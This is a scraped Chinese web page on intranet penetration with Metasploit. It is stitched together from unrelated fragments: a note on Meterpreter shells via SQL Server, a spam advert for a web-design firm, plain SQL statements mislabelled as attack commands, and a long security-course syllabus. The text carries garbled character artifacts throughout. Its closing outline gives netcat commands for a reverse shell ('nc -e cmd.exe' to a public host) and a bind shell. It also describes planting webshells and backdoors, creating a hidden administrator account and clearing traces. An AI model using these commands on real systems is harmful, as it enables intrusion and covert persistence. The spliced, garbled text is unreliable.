如何使用metasploit進(jìn)行內(nèi)網(wǎng)滲透詳細(xì)過程

在獲得sql server的登陸權(quán)限后同樣可以快速的獲得meterpreter shell。

創(chuàng)新互聯(lián)是一家專注于網(wǎng)站建設(shè)、成都網(wǎng)站制作與策劃設(shè)計(jì),大武口網(wǎng)站建設(shè)哪家好?創(chuàng)新互聯(lián)做網(wǎng)站,專注于網(wǎng)站建設(shè)十多年,網(wǎng)設(shè)計(jì)領(lǐng)域的專業(yè)建站公司;建站業(yè)務(wù)涵蓋:大武口等地區(qū)。大武口做網(wǎng)站價(jià)格咨詢:18980820575

注意這里METHOD選項(xiàng)，三種方法都要使用XP_cmdshell，而第一種ps是使用powershell，第二種需要使用wscript.exe，第三種則要用到debug.com。 本地沒有環(huán)境，就不截圖演示了

others

不管是什么場景，只要能轉(zhuǎn)換成文件上傳和執(zhí)行權(quán)限就可以得到shell。在獲得一種權(quán)限時(shí)當(dāng)然可以先google一番是否有可適用的腳本，如果沒有再分析是否能轉(zhuǎn)換為文件操作和執(zhí)行權(quán)限。如果可以那就可以得到shell了。 比如:

mysql and sqlserver ..etc = file/webshell =shell

本地同樣也測試了下tunna里自帶的msf插件，測試了php版的。代碼大致是這樣的

BT滲透sqlserver2000的命令

(1) 數(shù)據(jù)記錄篩選：

sql="select * from 數(shù)據(jù)表 where 字段名=字段值 order by 字段名 [desc]"

sql="select * from 數(shù)據(jù)表 where 字段名 like '%字段值%' order by 字段名 [desc]"

sql="select top 10 * from 數(shù)據(jù)表 where 字段名 order by 字段名 [desc]"

sql="select * from 數(shù)據(jù)表 where 字段名 in ('值1','值2','值3')"

sql="select * from 數(shù)據(jù)表 where 字段名 between 值1 and 值2"

(2) 更新數(shù)據(jù)記錄：

sql="update 數(shù)據(jù)表 set 字段名=字段值 where 條件表達(dá)式"

sql="update 數(shù)據(jù)表 set 字段1=值1,字段2=值2 …… 字段n=值n where 條件表達(dá)式"

(3) 刪除數(shù)據(jù)記錄：

sql="delete from 數(shù)據(jù)表 where 條件表達(dá)式"

sql="delete from 數(shù)據(jù)表" (將數(shù)據(jù)表所有記錄刪除)

新手小白想學(xué)習(xí)滲透和網(wǎng)絡(luò)安全，從哪里入手？

基礎(chǔ)到入門的學(xué)習(xí)路線

一、網(wǎng)絡(luò)安全

網(wǎng)絡(luò)基礎(chǔ)

網(wǎng)絡(luò)概述

（行業(yè)背景+就業(yè)方向+課程體系結(jié)構(gòu)）

Vmware

IP地址的概述與應(yīng)用

DOS命令與批處理

Windows服務(wù)安全

用戶管理

破解系統(tǒng)用戶密碼

NTFS權(quán)限

文件服務(wù)器

DNS服務(wù)

DHCP服務(wù)

IIS服務(wù)

活動(dòng)目錄

域控管理

組策略（一）

組策略（二）

安全策略

PKI與證書服務(wù)

windows安全基線

Windows server 2003安全配置基線

階段綜合項(xiàng)目一

以太網(wǎng)交換與路由技術(shù)

回顧windows服務(wù)

OSI協(xié)議簇

交換機(jī)的基本原理與配置

IP包頭分析與靜態(tài)路由

分析ARP攻擊與欺騙

虛擬局域網(wǎng)VLAN

VTP

單臂路由與DHCP

子網(wǎng)劃分VLSM

高級網(wǎng)絡(luò)技術(shù)

回顧

三層交換

ACL-1

ACL-2

網(wǎng)絡(luò)地址轉(zhuǎn)換

動(dòng)態(tài)路由協(xié)議RIP

ipsec VPN

VPN遠(yuǎn)程訪問

網(wǎng)絡(luò)安全基線

Cisco基礎(chǔ)網(wǎng)絡(luò)設(shè)備安全配置基線

安全設(shè)備防護(hù)

防火墻原理及部署方式

防火墻高級配置

IDS

WAF

階段綜合項(xiàng)目二

二、服務(wù)安全

Linux安全運(yùn)維

Linux操作系統(tǒng)介紹與安裝與目錄結(jié)構(gòu)分析

Linux系統(tǒng)的基本操作與軟件安裝

Linux系統(tǒng)下用戶以及權(quán)限管理

網(wǎng)絡(luò)配置與日志服務(wù)器建立應(yīng)急思路

建立php主頁解析以及主頁的訪問控制

Nginx服務(wù)都建立以及tomcat負(fù)載均衡

iptables包過濾與網(wǎng)絡(luò)地址轉(zhuǎn)換

實(shí)用型腳本案例

階段綜合項(xiàng)目三

三、代碼安全

前端代碼安全

HTML語言

CSS盒子模型

JS概述與變量

JS數(shù)據(jù)類型

JS函數(shù)

程序的流程控制

條件判斷與等值判斷結(jié)構(gòu)

循環(huán)結(jié)構(gòu)

JS數(shù)組

數(shù)據(jù)庫安全

sqlserver

access

oracle

mysql

后臺(tái)代碼安全

PHP基礎(chǔ)

PHP語法

PHP流程控制與數(shù)組

PHP代碼審計(jì)中常用函數(shù)

PHP操作mysql數(shù)據(jù)庫

PHP代碼審計(jì)（一）

PHP代碼審計(jì)（二）

Python安全應(yīng)用

初識(shí)python上篇

初識(shí)python下篇

基礎(chǔ)進(jìn)階與對象和數(shù)字

字符串列表和元祖

字典條件循環(huán)和標(biāo)準(zhǔn)輸入輸出

錯(cuò)誤異常函數(shù)基礎(chǔ)

函數(shù)的高級應(yīng)用和模塊

面向?qū)ο缶幊膛c組合及派生

正則表達(dá)式和爬蟲

socket套接字

四、滲透測試

滲透測試導(dǎo)論

滲透測試方法論

法律法規(guī)與道德

Web 工作機(jī)制

HTTP 協(xié)議

Cookie 與session

同源策略

情報(bào)收集

DNS

DNS 解析

IP 查詢

主機(jī)測探與端口掃描

網(wǎng)絡(luò)漏洞掃描

Web 漏洞掃描

其他工具

口令破解

口令安全威脅

破解方式

windows 口令破解

Linux 口令破解

網(wǎng)絡(luò)服務(wù)口令破解

在線密碼查詢網(wǎng)站

常見的漏洞攻防

SQL 注入基礎(chǔ)

四大基本手法

其他注入手法

SQLmap 的使用

XSS 漏洞概述

XSS 的分類

XSS的構(gòu)造

XSS 的變形

Shellcode 的調(diào)用

XSS 通關(guān)挑戰(zhàn)

實(shí)戰(zhàn)：Session 劫持

PHP 代碼執(zhí)行

OS 命令執(zhí)行

文件上傳漏洞原理概述

WebShell 概述

文件上傳漏洞的危害

常見的漏洞攻防

PUT 方法上傳文件

.htaccess 攻擊

圖片木馬的制作

upload-labs 上傳挑戰(zhàn)

Web容器解析漏洞

開源編輯器上傳漏洞

開源CMS 上傳漏洞

PHP 中的文件包含語句

文件包含示例

漏洞原理及特點(diǎn)

Null 字符問題

文件包含漏洞的利用

業(yè)務(wù)安全概述

業(yè)務(wù)安全測試流程

業(yè)務(wù)數(shù)據(jù)安全

密碼找回安全

CSRF

SSRF

提權(quán)與后滲透

服務(wù)器提權(quán)技術(shù)

隧道技術(shù)

緩沖區(qū)溢出原理

Metasploit Framework

前言

urllib2

SQL 注入POC 到EXP

定制EXP

案例：Oracle Weblogic CVE2017-10271 RCE

案例：JBoss AS 6.X 反序列化

五、項(xiàng)目實(shí)戰(zhàn)

漏洞復(fù)現(xiàn)

內(nèi)網(wǎng)靶機(jī)實(shí)戰(zhàn)

內(nèi)網(wǎng)攻防對抗

安全服務(wù)規(guī)范

安全眾測項(xiàng)目實(shí)戰(zhàn)

外網(wǎng)滲透測試實(shí)戰(zhàn)

六、安全素養(yǎng)

網(wǎng)絡(luò)安全行業(yè)導(dǎo)論

網(wǎng)絡(luò)安全崗位職責(zé)分析

網(wǎng)絡(luò)安全法認(rèn)知

網(wǎng)絡(luò)安全認(rèn)證

職業(yè)人素質(zhì)

web滲透是什么？

Web滲透測試分為白盒測試和黑盒測試，白盒測試是指目標(biāo)網(wǎng)站的源碼等信息的情況下對其滲透，相當(dāng)于代碼分析審計(jì)。而黑盒測試則是在對該網(wǎng)站系統(tǒng)信息不知情的情況下滲透，以下所說的Web滲透就是黑盒滲透。

Web滲透分為以下幾個(gè)步驟，信息收集，漏洞掃描，漏洞利用，提權(quán)，內(nèi)網(wǎng)滲透，留后門，清理痕跡。一般的滲透思路就是看是否有注入漏洞，然后注入得到后臺(tái)管理員賬號(hào)密碼，登錄后臺(tái)，上傳小馬，再通過小馬上傳大馬，提權(quán)，內(nèi)網(wǎng)轉(zhuǎn)發(fā)，進(jìn)行內(nèi)網(wǎng)滲透，掃描內(nèi)網(wǎng)c段存活主機(jī)及開放端口，看其主機(jī)有無可利用漏洞（nessus）端口（nmap）對應(yīng)服務(wù)及可能存在的漏洞，對其利用（msf）拿下內(nèi)網(wǎng)，留下后門，清理痕跡?；蛘呖词欠裼猩蟼魑募牡胤剑蟼饕痪湓捘抉R，再用菜刀鏈接，拿到數(shù)據(jù)庫并可執(zhí)行cmd命令，可繼續(xù)上大馬.........思路很多，很多時(shí)候成不成功可能就是一個(gè)思路的問題，技術(shù)可以不高，思路一定得騷。

信息收集

信息收集是整個(gè)流程的重中之重，前期信息收集的越多，Web滲透的成功率就越高。

DNS域名信息：通過url獲取其真實(shí)ip,子域名(Layer子域名爆破機(jī))，旁站(K8旁站，御劍1.5)，c段，網(wǎng)站負(fù)責(zé)人及其信息（whois查詢）

整站信息：服務(wù)器操作系統(tǒng)、服務(wù)器類型及版本(Apache/Nginx/Tomcat/IIS)、數(shù)據(jù)庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型；

網(wǎng)站常見搭配為：

ASP和ASPX：ACCESS、SQLServer

PHP：MySQL、PostgreSQL

JSP：Oracle、MySQL

敏感目錄信息（御劍，dirbust）

開放端口信息（nmp）

漏洞掃描

利用AWVS,AppScan,OWASP-ZAP,等可對網(wǎng)站進(jìn)行網(wǎng)站漏洞的初步掃描，看其是否有可利用漏洞。

常見漏洞：

SQL注入

XSS跨站腳本

CSRF跨站請求偽造

XXE(XML外部實(shí)體注入)漏洞

SSRF(服務(wù)端請求偽造)漏洞

文件包含漏洞

文件上傳漏洞

文件解析漏洞

遠(yuǎn)程代碼執(zhí)行漏洞

CORS跨域資源共享漏洞

越權(quán)訪問漏洞

目錄遍歷漏洞和任意文件讀取/下載漏洞

漏洞利用

用工具也好什么也好對相應(yīng)漏洞進(jìn)行利用

如：

Sql注入（sqlmap）

XSS（BEEF）

后臺(tái)密碼爆破（burp）

端口爆破（hydra）

提權(quán)

獲得shell之后我們權(quán)限可能很低，因此要對自己提權(quán)，可以根據(jù)服務(wù)器版本對應(yīng)的exp進(jìn)行提權(quán)，對于Windows系統(tǒng)也可看其補(bǔ)丁對應(yīng)漏洞的exp進(jìn)行提權(quán)

內(nèi)網(wǎng)滲透

首先進(jìn)行端口轉(zhuǎn)發(fā)可用nc

nc使用方法：

反向連接

在公網(wǎng)主機(jī)上進(jìn)行監(jiān)聽：

nc-lvp 4444

在內(nèi)網(wǎng)主機(jī)上執(zhí)行：

nc-e cmd.exe 公網(wǎng)主機(jī)ip4444

成功之后即可得到一個(gè)內(nèi)網(wǎng)主機(jī)shell

正向連接

遠(yuǎn)程主機(jī)上執(zhí)行：

nc-l -p 4444 -t -e cmd.exe

本地主機(jī)上執(zhí)行：

nc-vv 遠(yuǎn)程主機(jī)ip4444

成功后，本地主機(jī)即可遠(yuǎn)程主機(jī)的一個(gè)shell

然后就是對內(nèi)網(wǎng)進(jìn)行滲透了，可以用主機(jī)漏洞掃描工具（nessus,x-scan等）進(jìn)行掃描看是否有可用漏洞，可用msf進(jìn)行利用，或者用nmap掃描存活主機(jī)及開放端口，可用hydra進(jìn)行端口爆破或者用msf對端口對應(yīng)漏洞得到shell拿下內(nèi)網(wǎng)留后門

留后門

對于網(wǎng)站上傳一句話木馬，留下后門

對于windows用戶可用hideadmin創(chuàng)建一個(gè)超級隱藏賬戶

手工：

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

這樣的話在cmd命令中看不到，但在控制面板可以看到，還需要改注冊表才能實(shí)現(xiàn)控制版面也看不到，太過麻煩，不多贅述，所以還是用工具省心省力。